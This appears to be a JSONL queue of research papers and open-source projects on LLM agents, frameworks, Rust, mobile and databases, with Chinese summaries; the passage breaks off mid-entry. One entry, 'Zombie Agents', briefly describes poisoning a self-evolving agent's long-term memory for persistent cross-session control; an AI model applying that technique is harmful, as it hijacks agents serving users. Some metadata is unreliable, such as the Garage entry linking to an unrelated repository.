+{"slug":"apex-policy-exploration","area":"papers","topic":"agents","title":"APEX: Autonomous Policy Exploration for Self-Evolving LLM Agents","meta":{"col3":"2026","col4":"自进化 agent 的探索坍缩问题:策略图(DAG of milestones)做 fork discovery + policy selection"},"url":"https://arxiv.org/abs/2605.21240","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"exg-experience-graphs","area":"papers","topic":"agents","title":"EXG: Self-Evolving Agents with Experience Graphs","meta":{"col3":"2026","col4":"把成功/失败经验组织成结构化关系图,支持在线增长 + 离线复用;plug-and-play"},"url":"https://arxiv.org/abs/2605.17721","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"eve-agent-evidence","area":"papers","topic":"agents","title":"EVE-Agent: Evidence-Verifiable Self-Evolving Agents","meta":{"col3":"2026","col4":"自生成训练数据须可验证:proposer 给问答+证据 span,verifier 按边际增益打分"},"url":"https://arxiv.org/abs/2605.22905","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"llm-wiki-retrieval-reasoning","area":"papers","topic":"agents","title":"Retrieval as Reasoning: Self-Evolving Agent-Native Retrieval via LLM-Wiki","meta":{"col3":"2026","col4":"把外部知识编译成可演化 Wiki 页 + 双向链接;HotpotQA/MuSiQue SOTA"},"url":"https://arxiv.org/abs/2605.25480","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"evo-memory-2511","area":"papers","topic":"agents","title":"Evo-Memory: Benchmarking LLM Agent Test-time Learning with Self-Evolving Memory","meta":{"col3":"2025","col4":"流式任务下的自进化记忆 benchmark;统一 10+ memory 模块;提出 ReMem pipeline"},"url":"https://arxiv.org/abs/2511.20857","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"self-evolving-software-agents","area":"papers","topic":"agents","title":"Self-Evolving Software Agents (BDI-LLM)","meta":{"col3":"2026","col4":"BDI 推理 + LLM 让 agent 自主演化目标/推理/可执行代码;多 agent 环境实验"},"url":"https://arxiv.org/abs/2604.27264","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"skill-as-pseudocode","area":"papers","topic":"agents","title":"Skill-as-Pseudocode: Refactoring Skill Libraries to Pseudocode","meta":{"col3":"2026","col4":"markdown skill → 类型化伪代码 + 四步 deterministic 验证;ALFWorld -22% token -14% LLM 调用"},"url":"https://arxiv.org/abs/2605.27955","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"mind-skill","area":"papers","topic":"agents","title":"MIND-Skill: Quality-Guaranteed Skill Generation via Multi-Agent Induction and Deduction","meta":{"col3":"2026","col4":"induction agent 抽 skill / deduction agent 重建轨迹;reconstruction+outcome+rubric 三 loss + TextGrad"},"url":"https://arxiv.org/abs/2605.08670","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"skill-pro-nonparametric-ppo","area":"papers","topic":"agents","title":"Skill-Pro: Learning Reusable Skills from Experience via Non-Parametric PPO","meta":{"col3":"2026","col4":"Skill-MDP + 语义梯度 + PPO Gate;不动权重学可复用过程性 skill"},"url":"https://arxiv.org/abs/2602.01869","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"effiskill","area":"papers","topic":"agents","title":"EffiSkill: Agent Skill Based Automated Code Efficiency Optimization","meta":{"col3":"2026","col4":"两阶段 skill 库:mine Operator/Meta skill → 应用到未见程序;EffiBench-X +3.7~12.5pp"},"url":"https://arxiv.org/abs/2603.27850","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"skill-sd-self-distillation","area":"papers","topic":"agents","title":"Skill-SD: Skill-Conditioned Self-Distillation for Multi-turn LLM Agents","meta":{"col3":"2026","col4":"用 agent 自身轨迹生成 skill 当 dynamic teacher;importance-weighted reverse-KL;AppWorld +14%"},"url":"https://arxiv.org/abs/2604.10674","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"mmskills-multimodal","area":"papers","topic":"agents","title":"MMSkills: Towards Multimodal Skills for General Visual Agents","meta":{"col3":"2026","col4":"多模态过程性知识:state cards + multi-view keyframes;GUI/游戏 visual agent 通用提升"},"url":"https://arxiv.org/abs/2605.13527","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"webxskill","area":"papers","topic":"agents","title":"WebXSkill: Skill Learning for Autonomous Web Agents","meta":{"col3":"2026","col4":"executable skill = 参数化代码 + 步骤级 NL;URL 图索引;WebArena +9.8 / WebVoyager +12.9"},"url":"https://arxiv.org/abs/2604.13318","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"clawtrace-cost-aware","area":"papers","topic":"agents","title":"ClawTrace: Cost-Aware Tracing for LLM Agent Skill Distillation","meta":{"col3":"2026","col4":"按 cost 归因到每一步 skill 操作;preserve/prune/repair 三类补丁;揭示 prune 才是质量护栏"},"url":"https://arxiv.org/abs/2604.23853","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"skcc-skill-compiler","area":"papers","topic":"agents","title":"SkCC: Portable and Secure Skill Compilation for Cross-Framework LLM Agents","meta":{"col3":"2026","col4":"Skill 编译器 + SkIR 强类型 IR;O(m·n) → O(m+n);Claude Code 21→33%, Kimi CLI 35→49%"},"url":"https://arxiv.org/abs/2605.03353","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"code-as-agent-harness","area":"papers","topic":"agents","title":"Code as Agent Harness","meta":{"col3":"2026","col4":"把 code 当 agent 基础设施的综述:harness interface / mechanism / scaling 三层"},"url":"https://arxiv.org/abs/2605.18747","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"memcoder-co-evolution","area":"papers","topic":"agents","title":"MemCoder: Your Code Agent Can Grow Alongside You with Structured Memory","meta":{"col3":"2026","col4":"从 git commit 蒸馏 intent→code 映射;自精炼 + 经验内化;SWE-bench Verified +9.4pp over DeepSeek-V3.2"},"url":"https://arxiv.org/abs/2603.13258","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"zombie-agents-2602","area":"papers","topic":"agents","title":"Zombie Agents: Persistent Control of Self-Evolving LLM Agents via Self-Reinforcing Injections","meta":{"col3":"2026","col4":"自进化 agent 的安全侧:长期记忆被污染 → 跨会话持久化攻击 → 抗截断/抗相关性过滤"},"url":"https://arxiv.org/abs/2602.15654","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"self-evolving-recsys-2602","area":"papers","topic":"agents","title":"Self-Evolving Recommendation System: Autonomous Model Optimization with LLM Agents","meta":{"col3":"2026","col4":"YouTube 实战:Offline Inner Loop + Online Outer Loop 双 agent 自动跑超参/架构/reward 实验"},"url":"https://arxiv.org/abs/2602.10226","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"n8n","area":"projects","topic":"devops","title":"n8n","url":"https://github.com/n8n-io/n8n","status":"queued","meta":{"col3":"187791","col4":"可视化工作流自动化平台,400+ 集成把 CI/CD 与 AI agent 编排连成一体"}} +{"slug":"autogpt","area":"projects","topic":"data-science-ai","title":"AutoGPT","url":"https://github.com/Significant-Gravitas/AutoGPT","status":"queued","meta":{"col3":"184295","col4":"自主 Agent 编排先驱,goal-driven loop 定义了第一波 agentic 应用范式"}} +{"slug":"flowise","area":"projects","topic":"data-science-ai","title":"Flowise","url":"https://github.com/FlowiseAI/Flowise","status":"queued","meta":{"col3":"52810","col4":"拖拽式 LLM 应用 builder,LangChain 节点可视化,低代码 RAG/agent 原型首选"}} +{"slug":"vercel-ai","area":"projects","topic":"frontend-web","title":"Vercel AI SDK","url":"https://github.com/vercel/ai","status":"written","meta":{"col3":"24220","col4":"TypeScript 统一 LLM streaming/UI 工具链,Next.js 生态 AI 前端事实标准"},"claimed_by":null} +{"slug":"mastra","area":"projects","topic":"data-science-ai","title":"Mastra","url":"https://github.com/mastra-ai/mastra","status":"queued","meta":{"col3":"23871","col4":"TypeScript agent 框架,workflow + memory + eval 一体,面向生产级 TS 全栈"}} +{"slug":"pydantic-ai","area":"projects","topic":"data-science-ai","title":"Pydantic AI","url":"https://github.com/pydantic/pydantic-ai","status":"queued","meta":{"col3":"17055","col4":"Pydantic 团队出品,类型安全 agent + tool + structured output,Python 侧新标杆"}} +{"slug":"deer-flow","area":"projects","topic":"data-science-ai","title":"DeerFlow","url":"https://github.com/bytedance/deer-flow","status":"queued","meta":{"col3":"71051","col4":"字节开源 super agent harness,LangGraph 底座 + 子 agent/沙箱/技能开箱即用"}} +{"slug":"ollama","area":"projects","topic":"data-science-ai","title":"Ollama","url":"https://github.com/ollama/ollama","status":"written","meta":{"col3":"173369","col4":"本地 LLM 一键拉取运行,GGUF + Metal/CUDA,开发者本地推理入口"},"claimed_by":null} +{"slug":"dify","area":"projects","topic":"data-science-ai","title":"Dify","url":"https://github.com/langgenius/dify","status":"written","meta":{"col3":"142915","col4":"开源 LLM 应用开发平台,workflow/RAG/agent/观测一体,从原型到生产"},"claimed_by":null} +{"slug":"open-webui","area":"projects","topic":"data-science-ai","title":"Open WebUI","url":"https://github.com/open-webui/open-webui","status":"queued","meta":{"col3":"80000","col4":"自托管 ChatGPT 界面,默认对接 Ollama,RAG/多模型/插件生态最活跃"}} +{"slug":"litellm","area":"projects","topic":"data-science-ai","title":"LiteLLM","url":"https://github.com/BerriAI/litellm","status":"queued","meta":{"col3":"20000","col4":"100+ LLM 提供商统一 OpenAI 兼容 API,路由/计费/限流网关"}} +{"slug":"mem0","area":"projects","topic":"data-science-ai","title":"Mem0","url":"https://github.com/mem0ai/mem0","status":"queued","meta":{"col3":"51900","col4":"AI agent 长期记忆层,向量+图混合,Open WebUI 等栈常用记忆后端"}} +{"slug":"openclaw","area":"projects","topic":"data-science-ai","title":"OpenClaw","url":"https://github.com/openclaw/openclaw","status":"queued","meta":{"col3":"378399","col4":"本地常驻 personal AI assistant,多通道消息网关,2026 GitHub star 增速纪录"}} +{"slug":"superplane","area":"projects","topic":"devops","title":"SuperPlane","url":"https://github.com/superplanehq/superplane","status":"queued","meta":{"col3":"2871","col4":"平台工程控制面,事件驱动 workflow 串联 Git/CI/观测/事故响应"}} +{"slug":"gea","area":"projects","topic":"frontend-web","title":"Gea","url":"https://github.com/dashersw/gea","status":"queued","meta":{"col3":"1088","col4":"编译器原生响应式 UI 框架,hello-world 仅 121B brotli,极致轻量"}} +{"slug":"tanstack-start","area":"projects","topic":"frontend-web","title":"TanStack Start","url":"https://github.com/TanStack/router","status":"queued","meta":{"col3":"12000","col4":"类型安全全栈 React 框架,TanStack Router 驱动,Next.js 轻量替代"}} +{"slug":"dexter","area":"projects","topic":"data-science-ai","title":"Dexter","url":"https://github.com/virattt/dexter","status":"queued","meta":{"col3":"23739","col4":"TypeScript/Bun 自主金融研究 agent,plan-execute-validate 闭环"}} +{"slug":"context-mode","area":"projects","topic":"data-science-ai","title":"context-mode","url":"https://github.com/mksglu/context-mode","status":"queued","meta":{"col3":"13011","col4":"MCP server 优化 coding agent 上下文:沙箱+会话追踪+代码分析"}} +{"slug":"agency-agents","area":"projects","topic":"data-science-ai","title":"Agency Agents","url":"https://github.com/msitarzewski/agency-agents","status":"queued","meta":{"col3":"93599","col4":"可复用 AI agent 人格/角色库,多工作流专用 agent 模板集合"}} +{"slug":"awesome-ai-apps","area":"projects","topic":"data-science-ai","title":"awesome-ai-apps","url":"https://github.com/Arindam200/awesome-ai-apps","status":"queued","meta":{"col3":"11260","col4":"80+ LLM 应用示例与教程合集,快速上手 agent/RAG 实战"}} +{"slug":"openai-agents-python","area":"projects","topic":"data-science-ai","title":"OpenAI Agents Python","url":"https://github.com/openai/openai-agents-python","status":"queued","meta":{"col3":"26290","col4":"OpenAI 官方 agent SDK,handoff/guardrail/tracing 生产级抽象"}} +{"slug":"livekit-agents","area":"projects","topic":"data-science-ai","title":"LiveKit Agents","url":"https://github.com/livekit/agents","status":"queued","meta":{"col3":"10472","col4":"实时语音 AI agent 框架,STT/LLM/TTS pipeline + WebRTC 一体"}} +{"slug":"nuclei","area":"projects","topic":"security-privacy","title":"Nuclei","url":"https://github.com/projectdiscovery/nuclei","status":"queued","meta":{"col3":"25000","col4":"YAML 模板驱动漏洞扫描,ProjectDiscovery 生态核心,CI/红队标配"}} +{"slug":"falco","area":"projects","topic":"security-privacy","title":"Falco","url":"https://github.com/falcosecurity/falco","status":"queued","meta":{"col3":"7500","col4":"CNCF 运行时威胁检测,eBPF/syscall 规则引擎,K8s 安全观测事实标准"}} +{"slug":"crowdsec","area":"projects","topic":"security-privacy","title":"CrowdSec","url":"https://github.com/crowdsecurity/crowdsec","status":"queued","meta":{"col3":"11000","col4":"协作式 IPS,社区威胁情报 + 本地决策引擎,Fail2ban 现代替代"}} +{"slug":"wazuh","area":"projects","topic":"security-privacy","title":"Wazuh","url":"https://github.com/wazuh/wazuh","status":"queued","meta":{"col3":"12000","col4":"开源 XDR/SIEM,日志/完整性/漏洞/合规一体,Elastic 栈常见搭档"}} +{"slug":"model-native-computing","area":"papers","topic":"systems","title":"Model-Native Computing Architecture","url":"https://arxiv.org/abs/2606.00288","status":"queued","meta":{"col3":"2026","col4":"用计算机体系结构类比 envision LLM 时代双平面系统:概率执行 + 确定性控制"}} +{"slug":"minimax-sparse-attention","area":"papers","topic":"ml-systems","title":"MiniMax Sparse Attention","url":"https://arxiv.org/abs/2606.13392","status":"queued","meta":{"col3":"2026","col4":"稀疏 softmax attention 突破二次瓶颈,1M 上下文 prefill 14.2× 加速"}} +{"slug":"memdreamer","area":"papers","topic":"agents","title":"MemDreamer: Decoupling Perception and Reasoning for Long Video","url":"https://arxiv.org/abs/2606.07512","status":"queued","meta":{"col3":"2026","col4":"分层图记忆 + agentic 检索,长视频理解上下文仅 2% 全量 ingestion"}} +{"slug":"glm-5-agentic-engineering","area":"papers","topic":"llm","title":"GLM-5: From Vibe Coding to Agentic Engineering","url":"https://arxiv.org/abs/2602.15763","status":"queued","meta":{"col3":"2026","col4":"智谱 GLM-5 技术报告,从 vibe coding 迈向 agentic 工程化能力"}} +{"slug":"gated-deltanet-2","area":"papers","topic":"ml-systems","title":"Gated DeltaNet-2: Decoupling Erase and Write in Linear Attention","url":"https://arxiv.org/abs/2605.22791","status":"queued","meta":{"col3":"2026","col4":"线性 attention 解耦 erase/write,hybrid 架构长上下文效率新方案"}} +{"slug":"nemotron-3-super","area":"papers","topic":"llm","title":"Nemotron 3 Super: MoE Hybrid Mamba-Transformer for Agentic Reasoning","url":"https://arxiv.org/abs/2604.12374","status":"queued","meta":{"col3":"2026","col4":"NVIDIA 开源 MoE+Mamba-Transformer 混合,面向 agentic 推理"}} +{"slug":"step-3-5-flash","area":"papers","topic":"llm","title":"Step 3.5 Flash: Open Frontier-Level Intelligence with 11B Active Parameters","url":"https://arxiv.org/abs/2602.10604","status":"queued","meta":{"col3":"2026","col4":"阶跃 Step 3.5 Flash,11B 激活参数达到 frontier 级开源智能"}} +{"slug":"zaya1-8b","area":"papers","topic":"llm","title":"ZAYA1-8B Technical Report","url":"https://arxiv.org/abs/2605.05365","status":"queued","meta":{"col3":"2026","col4":"ZAYA1-8B 小模型技术报告,高效 dense 架构 benchmark 对标"}} +{"slug":"minimax-m2-series","area":"papers","topic":"llm","title":"The MiniMax-M2 Series: Mini Activations Unleashing Max Intelligence","url":"https://arxiv.org/abs/2605.26494","status":"queued","meta":{"col3":"2026","col4":"MiniMax M2 系列:小激活 MoE 释放强推理与 agent 能力"}} +{"slug":"spike-sparse-sink-anatomy","area":"papers","topic":"ml-systems","title":"The Spike, the Sparse and the Sink: Anatomy of Massive Activations","url":"https://arxiv.org/abs/2603.05498","status":"queued","meta":{"col3":"2026","col4":"解剖 massive activation 与 attention sink,解释长上下文与 streaming 现象"}} +{"slug":"auto-gpt","area":"projects","topic":"ai-agent-infra","title":"AutoGPT — 自主 Agent 先驱","url":"https://github.com/Significant-Gravitas/AutoGPT","status":"queued","meta":{"col3":"184295","col4":"GPT-4 自主分解任务的开山项目,现演进为可视化 Agent 平台"}} +{"slug":"browser-use","area":"projects","topic":"ai-agent-infra","title":"browser-use — LLM 浏览器自动化","url":"https://github.com/browser-use/browser-use","status":"written","meta":{"col3":"93857","col4":"Python Agent 驱动真实浏览器,网页操作与数据采集主流方案"},"claimed_by":null} +{"slug":"deerflow","area":"projects","topic":"ai-agent-infra","title":"DeerFlow — 深度研究 Agent","url":"https://github.com/bytedance/deer-flow","status":"queued","meta":{"col3":"71000","col4":"字节开源的多 Agent 深度研究框架,长程检索与报告生成"}} +{"slug":"langgraph","area":"projects","topic":"ai-agent-infra","title":"LangGraph — 有状态 Agent 编排","url":"https://github.com/langchain-ai/langgraph","status":"queued","meta":{"col3":"32027","col4":"图状态机 + checkpoint + human-in-the-loop,生产级 Agent 工作流底座"}} +{"slug":"letta","area":"projects","topic":"ai-agent-infra","title":"Letta — 有状态记忆 Agent","url":"https://github.com/letta-ai/letta","status":"queued","meta":{"col3":"22707","col4":"原 MemGPT,长期记忆 + 自编辑上下文,研究 Agent 记忆范式代表"}} +{"slug":"openai-agents-sdk","area":"projects","topic":"ai-agent-infra","title":"OpenAI Agents SDK — 轻量多 Agent 框架","url":"https://github.com/openai/openai-agents-python","status":"written","meta":{"col3":"26290","col4":"Handoff + Guardrail + Tracing 四原语,百模型兼容的极简编排"},"claimed_by":null} +{"slug":"smolagents","area":"projects","topic":"ai-agent-infra","title":"smolagents — HuggingFace 极简 Agent","url":"https://github.com/huggingface/smolagents","status":"queued","meta":{"col3":"28100","col4":"代码即工具的最小 Agent 循环,HF 生态快速实验入口"}} +{"slug":"semantic-kernel","area":"projects","topic":"ai-agent-infra","title":"Semantic Kernel — 微软企业 Agent SDK","url":"https://github.com/microsoft/semantic-kernel","status":"queued","meta":{"col3":"28000","col4":"插件 + Planner + 记忆抽象,.NET/Python/Java 多语言企业 Agent 底座"}} +{"slug":"agno","area":"projects","topic":"ai-agent-infra","title":"Agno — 多模态 Agent 框架","url":"https://github.com/agno-agi/agno","status":"queued","meta":{"col3":"25000","col4":"Python 多 Agent 编排,工具/MCP/知识库一体化,快速搭生产 Agent"}} +{"slug":"google-adk","area":"projects","topic":"ai-agent-infra","title":"Google ADK — Agent 开发套件","url":"https://github.com/google/adk-python","status":"queued","meta":{"col3":"20000","col4":"Google 官方 Agent 框架,Gemini/Vertex 深度集成 + 层级多 Agent 组合"}} +{"slug":"ag2","area":"projects","topic":"ai-agent-infra","title":"AG2 — AutoGen 社区演进","url":"https://github.com/ag2ai/ag2","status":"queued","meta":{"col3":"15000","col4":"原 AutoGen 核心团队 fork,多 Agent 对话编排持续活跃维护"}} +{"slug":"rtk","area":"projects","topic":"ai-agent-infra","title":"RTK — Agent 命令输出压缩","url":"https://github.com/rtk-ai/rtk","status":"queued","meta":{"col3":"59873","col4":"Rust 写的 CLI 输出过滤器,为 Claude/Cursor 等 Agent 节省 60-90% token"}} +{"slug":"reqwest","area":"projects","topic":"rust-tools","title":"reqwest — Rust HTTP 客户端","url":"https://github.com/seanmonstar/reqwest","status":"queued","meta":{"col3":"11661","col4":"async/blocking 双模式,TLS/代理/JSON 开箱即用"}} +{"slug":"serde","area":"projects","topic":"rust-tools","title":"serde — Rust 序列化框架","url":"https://github.com/serde-rs/serde","status":"queued","meta":{"col3":"9000","col4":"derive 宏 + 零成本抽象,Rust 生态数据交换事实标准"}} +{"slug":"hyper","area":"projects","topic":"rust-tools","title":"hyper — Rust HTTP 实现","url":"https://github.com/hyperium/hyper","status":"queued","meta":{"col3":"15000","col4":"HTTP/1.1 + HTTP/2 底层库,reqwest/axum/tonic 的共同地基"}} +{"slug":"diesel","area":"projects","topic":"rust-tools","title":"diesel — Rust ORM 与查询构建器","url":"https://github.com/diesel-rs/diesel","status":"queued","meta":{"col3":"14000","col4":"编译期 SQL 类型检查,PostgreSQL/MySQL/SQLite 强类型数据访问"}} +{"slug":"tracing","area":"projects","topic":"rust-tools","title":"tracing — Rust 结构化日志/追踪","url":"https://github.com/tokio-rs/tracing","status":"queued","meta":{"col3":"5000","col4":"span + event 模型,async 生态可观测性基础设施"}} +{"slug":"clap","area":"projects","topic":"rust-tools","title":"clap — Rust CLI 参数解析","url":"https://github.com/clap-rs/clap","status":"queued","meta":{"col3":"14000","col4":"derive + builder 双 API,Rust CLI 工具默认选择"}} +{"slug":"mio","area":"projects","topic":"rust-tools","title":"mio — Rust 跨平台 I/O 多路复用","url":"https://github.com/tokio-rs/mio","status":"queued","meta":{"col3":"6000","col4":"epoll/kqueue/IOCP 抽象,Tokio 底层事件循环"}} +{"slug":"tower","area":"projects","topic":"rust-tools","title":"tower — 异步服务中间件","url":"https://github.com/tower-rs/tower","status":"queued","meta":{"col3":"4000","col4":"Service + Layer 组合模式,超时/重试/限流可插拔中间件"}} +{"slug":"tonic","area":"projects","topic":"rust-tools","title":"tonic — Rust gRPC 框架","url":"https://github.com/hyperium/tonic","status":"queued","meta":{"col3":"10000","col4":"prost + hyper 之上,async gRPC 客户端/服务端"}} +{"slug":"sqlx","area":"projects","topic":"rust-tools","title":"sqlx — 编译期校验 SQL 工具包","url":"https://github.com/launchbadge/sqlx","status":"queued","meta":{"col3":"13000","col4":"async 纯 Rust SQL,离线查询校验 + 连接池"}} +{"slug":"uniffi","area":"projects","topic":"rust-tools","title":"uniFFI — Rust 跨语言绑定生成器","url":"https://github.com/mozilla/uniffi-rs","status":"queued","meta":{"col3":"3000","col4":"Mozilla 出品,从 Rust 自动生成 Swift/Kotlin/Python 绑定"}} +{"slug":"slint","area":"projects","topic":"rust-tools","title":"Slint — 声明式跨平台 UI 工具包","url":"https://github.com/slint-ui/slint","status":"queued","meta":{"col3":"17000","col4":"Rust/C++/JS 嵌入式 GUI,MCU 到桌面一套 markup"}} +{"slug":"iced","area":"projects","topic":"rust-tools","title":"iced — Rust 原生 GUI 框架","url":"https://github.com/iced-rs/iced","status":"queued","meta":{"col3":"24000","col4":"Elm 架构 + GPU 渲染,跨平台桌面 UI"}} +{"slug":"dioxus","area":"projects","topic":"rust-tools","title":"Dioxus — React 风格 Rust UI","url":"https://github.com/DioxusLabs/dioxus","status":"queued","meta":{"col3":"22000","col4":"Web/桌面/移动端一套 React-like 组件模型"}} +{"slug":"leptos","area":"projects","topic":"rust-tools","title":"Leptos — Rust 全栈 Web 框架","url":"https://github.com/leptos-rs/leptos","status":"queued","meta":{"col3":"17000","col4":"细粒度响应式 + SSR/CSR + WASM isomorphic"}} +{"slug":"yew","area":"projects","topic":"rust-tools","title":"Yew — Rust WASM 前端框架","url":"https://github.com/yewstack/yew","status":"queued","meta":{"col3":"30000","col4":"组件化 + 虚拟 DOM,Rust 写浏览器 UI 先驱"}} +{"slug":"trunk","area":"projects","topic":"rust-tools","title":"Trunk — Rust WASM 构建工具","url":"https://github.com/trunk-rs/trunk","status":"queued","meta":{"col3":"4000","col4":"零配置 WASM 打包 + 热重载,Yew/Leptos 标配"}} +{"slug":"cargo-nextest","area":"projects","topic":"rust-tools","title":"cargo-nextest — Rust 并行测试运行器","url":"https://github.com/nextest-rs/nextest","status":"queued","meta":{"col3":"2000","col4":"比 cargo test 快数倍,CI 友好的测试编排"}} +{"slug":"ionic","area":"projects","topic":"mobile-cross-platform","title":"Ionic — 混合移动应用框架","url":"https://github.com/ionic-team/ionic-framework","status":"queued","meta":{"col3":"51000","col4":"Web 技术栈 + Capacitor 原生桥,企业混合 App 主流"}} +{"slug":"kotlin-multiplatform","area":"projects","topic":"mobile-cross-platform","title":"Kotlin Multiplatform — 跨平台共享逻辑","url":"https://github.com/JetBrains/kotlin","status":"queued","meta":{"col3":"50000","col4":"共享业务逻辑 + 平台原生 UI,Google 官方跨端战略"}} +{"slug":"compose-multiplatform","area":"projects","topic":"mobile-cross-platform","title":"Compose Multiplatform — 跨平台声明式 UI","url":"https://github.com/JetBrains/compose-multiplatform","status":"queued","meta":{"col3":"17000","col4":"Jetpack Compose 移植到 Desktop/iOS/Web,一套 Kotlin UI"}} +{"slug":"dotnet-maui","area":"projects","topic":"mobile-cross-platform","title":".NET MAUI — 微软跨平台应用框架","url":"https://github.com/dotnet/maui","status":"queued","meta":{"col3":"22000","col4":"Xamarin 继任者,C# 单代码库覆盖 iOS/Android/Windows/macOS"}} +{"slug":"valdi","area":"projects","topic":"mobile-cross-platform","title":"Valdi — Snapchat 跨平台 UI 框架","url":"https://github.com/Snapchat/Valdi","status":"queued","meta":{"col3":"8000","col4":"TypeScript 声明式 UI 编译到原生视图,无 WebView/JS 桥"}} +{"slug":"kivy","area":"projects","topic":"mobile-cross-platform","title":"Kivy — Python 跨平台应用框架","url":"https://github.com/kivy/kivy","status":"queued","meta":{"col3":"17000","col4":"OpenGL ES 自绘 UI,Python 写移动/桌面/树莓派应用"}} +{"slug":"qt","area":"projects","topic":"mobile-cross-platform","title":"Qt — C++ 跨平台应用框架","url":"https://github.com/qt/qtbase","status":"queued","meta":{"col3":"10000","col4":"工业级跨平台 GUI,嵌入式到桌面到移动端全覆盖"}} +{"slug":"capawesome","area":"projects","topic":"mobile-cross-platform","title":"Capawesome — Capacitor 插件生态","url":"https://github.com/capawesome-team/capacitor-plugins","status":"queued","meta":{"col3":"1000","col4":"Firebase/ML Kit/蓝牙等 Capacitor 高质量原生插件集合"}} +{"slug":"react-native-reanimated","area":"projects","topic":"mobile-cross-platform","title":"Reanimated — RN 高性能动画库","url":"https://github.com/software-mansion/react-native-reanimated","status":"queued","meta":{"col3":"10000","col4":"UI 线程运行动画,60fps 手势驱动交互的事实标准"}} +{"slug":"onsen-ui","area":"projects","topic":"mobile-cross-platform","title":"Onsen UI — 混合移动 UI 组件库","url":"https://github.com/OnsenUI/OnsenUI","status":"queued","meta":{"col3":"9000","col4":"Material/iOS 双风格 Web 组件,Cordova/Capacitor 友好"}} +{"slug":"gluestack","area":"projects","topic":"mobile-cross-platform","title":"gluestack-ui — 跨平台 React 组件库","url":"https://github.com/gluestack/gluestack-ui","status":"queued","meta":{"col3":"4000","col4":"React + React Native 共享组件,Tailwind 风格跨端 UI"}} +{"slug":"svelte-native","area":"projects","topic":"mobile-cross-platform","title":"svelte-native — Svelte 移动绑定","url":"https://github.com/halfnelson/svelte-native","status":"queued","meta":{"col3":"1000","col4":"Svelte 语法写 NativeScript 原生移动应用"}} +{"slug":"foundationdb","area":"projects","topic":"databases-storage","title":"FoundationDB — Apple 分布式 KV","url":"https://github.com/apple/foundationdb","status":"queued","meta":{"col3":"15000","col4":"有序 KV + 分层架构,Snowflake/Cockroach 等底层存储灵感来源"}} +{"slug":"rosedb","area":"projects","topic":"databases-storage","title":"RoseDB — Go Bitcask KV 引擎","url":"https://github.com/rosedblabs/rosedb","status":"queued","meta":{"col3":"4883","col4":"轻量日志结构 KV,Bitcask 模型现代 Go 实现"}} +{"slug":"tidesdb","area":"projects","topic":"databases-storage","title":"TidesDB — C 语言 LSM 存储引擎","url":"https://github.com/tidesdb/tidesdb","status":"queued","meta":{"col3":"1500","col4":"可嵌入事务 KV,闪存/RAM 优化 + 可选对象存储分层"}} +{"slug":"greptimedb","area":"projects","topic":"databases-storage","title":"GreptimeDB — 云原生时序数据库","url":"https://github.com/GreptimeTeam/greptimedb","status":"queued","meta":{"col3":"5000","col4":"Rust 实现,时序 + 分析 + AI 向量一体化,Prometheus/SQL 双协议"}} +{"slug":"scylladb","area":"projects","topic":"databases-storage","title":"ScyllaDB — C++ 高性能 NoSQL","url":"https://github.com/scylladb/scylladb","status":"queued","meta":{"col3":"14000","col4":"Cassandra 兼容 + 无锁分片架构,单机百万级 IOPS"}} +{"slug":"yugabytedb","area":"projects","topic":"databases-storage","title":"YugabyteDB — 分布式 SQL 数据库","url":"https://github.com/yugabyte/yugabyte-db","status":"queued","meta":{"col3":"9000","col4":"Postgres 兼容 + Cassandra 式扩展,开源 Spanner 替代"}} +{"slug":"neon","area":"projects","topic":"databases-storage","title":"Neon — Serverless Postgres","url":"https://github.com/neondatabase/neon","status":"queued","meta":{"col3":"17000","col4":"存储计算分离 + 分支即拷贝,云原生 Postgres 代表"}} +{"slug":"supabase","area":"projects","topic":"databases-storage","title":"Supabase — 开源 Firebase 替代","url":"https://github.com/supabase/supabase","status":"written","meta":{"col3":"80000","col4":"Postgres + Auth + Storage + Realtime + Edge Functions 一体化 BaaS"},"claimed_by":null} +{"slug":"immudb","area":"projects","topic":"databases-storage","title":"immudb — 防篡改数据库","url":"https://github.com/codenotary/immudb","status":"queued","meta":{"col3":"7000","col4":"Merkle 树验证 + SQL/KV 双接口,合规审计与零信任存储"}} +{"slug":"litestream","area":"projects","topic":"databases-storage","title":"Litestream — SQLite 实时复制","url":"https://github.com/benbjohnson/litestream","status":"queued","meta":{"col3":"4000","col4":"SQLite 变更流式备份到 S3,嵌入式数据库灾备标准方案"}} +{"slug":"garage","area":"projects","topic":"databases-storage","title":"Garage — 轻量 S3 兼容对象存储","url":"https://github.com/debauchee/barrier","status":"queued","meta":{"col3":"3000","col4":"去中心化对象存储,边缘/自托管 S3 替代"}} +{"slug":"minio","area":"projects","topic":"databases-storage","title":"MinIO — 